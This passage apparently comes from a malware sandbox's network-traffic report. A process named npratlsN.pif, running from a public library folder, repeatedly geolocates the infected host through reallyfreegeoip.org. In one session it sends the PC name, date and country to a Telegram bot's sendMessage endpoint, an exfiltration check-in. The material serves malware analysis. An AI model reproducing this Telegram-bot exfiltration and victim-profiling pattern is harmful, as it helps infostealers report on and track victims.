cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1961&rtt_var=747&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1453459&cwnd=239&unsent_bytes=0&cid=3f7bde9bed9c36d1&ts=139&x=0"
2025-01-16 07:25:57 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49947	104.21.80.1	443	8188	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:58 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 07:25:58 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:58 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327147 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RWudP%2F2uBAj4CZwvLlOZweJR1GZLCUW2S7%2FIkjWItzIx0vOhBEuxipXLxJQDNvw2RpjTYsV%2FhZ8OIH0lNSSRQ2boLIk7ckYkFuyO%2FsLx3tkzDya%2BKTOY7tZcj64skoRXpVmjhtTS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5fea6d0743ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1703&rtt_var=655&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1651583&cwnd=228&unsent_bytes=0&cid=4b727ecaeb48ee54&ts=158&x=0"
2025-01-16 07:25:58 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49948	104.21.80.1	443	8008	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:58 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 07:25:58 UTC	861	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:58 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327147 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lJCzw3j77RzpbAhpYXw0IAf24kwn1XXuksItz7yzpkavWJlbkr3%2FyAV%2B%2FdwcvmHHIWjfzsfHM9g96lj0RBIAAW6N%2BUsBhSr5%2BZeY1ypuwLJ0NNWquLnEIlJiMrgPSgoZ1Wq%2Bwv8v"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5fea99c50f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1453&min_rtt=1450&rtt_var=551&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1971640&cwnd=231&unsent_bytes=0&cid=28c37e4cd89cf4e7&ts=150&x=0"
2025-01-16 07:25:58 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49961	104.21.80.1	443	8188	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:26:00 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 07:26:00 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:26:00 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327149 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kl7CCdeU5qS4HHheNNJGuiOi5beA2frpk7MhUOsEWFRQ0xBwo1AR8sOpAipae5FhFJ8%2F4kiSgoBIq5xoUpfFJGMwC%2BxEfNiaeT9jlw5blDdYoWBBCHSoGM18ja6lfRYYCCQ%2Bu63g"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5ff27bfc0f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1759&min_rtt=1491&rtt_var=751&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1958417&cwnd=231&unsent_bytes=0&cid=d7e884e2986febb3&ts=132&x=0"
2025-01-16 07:26:00 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49962	104.21.80.1	443	8008	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:26:00 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 07:26:00 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:26:00 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327149 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f461rmVq4Dr7SmBffhNJChX49MCsf00%2Fjv75xVKRQsjS3u9WjAA1AkOl3%2BpOS7Ocs5hH5hmzxUS32R1grFLUu9nPEV526vxjYYXfo1ZDWEfYMIcwuom%2Fh1B6kGaHr9LIAx7TI9eB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5ff2be088c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1923&min_rtt=1919&rtt_var=729&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1491317&cwnd=223&unsent_bytes=0&cid=3af695006229bb5d&ts=146&x=0"
2025-01-16 07:26:00 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49974	104.21.80.1	443	8008	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:26:01 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 07:26:01 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:26:01 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327150 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jnqTBhBSjuuerYenY0wI3gQMGvAKCxQKYpYDlUcsNmRtzVK1VJR7kSEEhH2ZKmKJWNuBjdoGDcJ%2Botaicy2wRX1qumAGcdzNYYiU3ye%2Fuh8aLJwC3ybXjLw4MvxL7tMid0TFz3wk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5ffac8bc7d14-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2020&min_rtt=2012&rtt_var=771&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1403171&cwnd=239&unsent_bytes=0&cid=b7ca2c581bde4aee&ts=139&x=0"
2025-01-16 07:26:01 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49976	149.154.167.220	443	8008	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:26:02 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2016/01/2025%20/%2015:18:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-16 07:26:02 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 16 Jan 2025 07:26:02 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-16 07:26:02 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49982	104.21.80.1	443	8188	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:26:02 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 07:26:02 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:26:02 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327151 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8HvxzW%2B2QYsBwwkrWZ1s%2FzgJifIUz6n14BIyPP%2BpCwYdwg%2Fz6OxFyl3j7tWX1CZW4Y27hmaixW78sJlTtlDjfLPwapX3P9PjUTqylgq2hHOKEYz0OU0kLo%2B9s0wYfvtcgBZLIn0Z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c6000fa5c7d14-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1964&min_rtt=1961&rtt_var=741&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1470292&cwnd=239&unsent_bytes=0&cid=497d7787f0af8421&ts=149&x=0"
2025-01-16 07:26:02 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49994	104.21.80.1	443	8188	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:26:03 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 07:26:03 UTC	851	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:26:03 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327152 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZySLKVrxNMNJ0o4JMgAyKn4jG7gr7myq0rGTybGIc8rQFsG9eWH%2FxRs9b3xdmsD4EW5hbngQSGEGegaUeLkGQ5vv07Z600H4PmF8HzcoMFWFQjKAQxVaMrS8cBaGnV8Z9DSHdntf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c6008dfec42d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1562&rtt_var=596&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1820448&cwnd=229&unsent_bytes=0&cid=cb0f47cf6cdc68ae&ts=126&x=0"
2025-01-16 07:26:03 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50002	104.21.80.1	443	8188	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:26:04 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 07:26:04 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:26:04 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327154 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m1vtMsHt6Xv268NPlmVisWn8VIPos1xYtZ6XUkgOy%2F4xGqCttlATHrM8f4cS15eNLfVl%2FJnRLwKcUkNbYOXBvbzfHS57KMFWc%2FiGr5xlb4x23gGFGRWRLSKlHrro7MSKlAXm7XEp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c6010d9bf43ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1636&rtt_var=633&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1701631&cwnd=228&unsent_bytes=0&cid=8354afde87cb7bb4&ts=145&x=0"
2025-01-16 07:26:04 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50019	104.21.80.1	443	8188	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:26:07 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 07:26:07 UTC	861	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:26:07 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327156 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UKTnUiqEfL2Mxc04C1daCom0%2F%2BfixS3NL6ReBCTndC%2BT5HCfKhWG%2F3E1kJ5FO7ZxgMnNGHYzfARt0EpnzUbkSbL7FEXXwSsc7l3LZwecYjqkntZ%2B0B1%2F2bTGAa7p4oxl3JFSbCmY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c601f3a02c443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1423&min_rtt=1416&rtt_var=546&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1976980&cwnd=244&unsent_bytes=0&cid=2551e4e8ffa4bf05&ts=161&x=0"
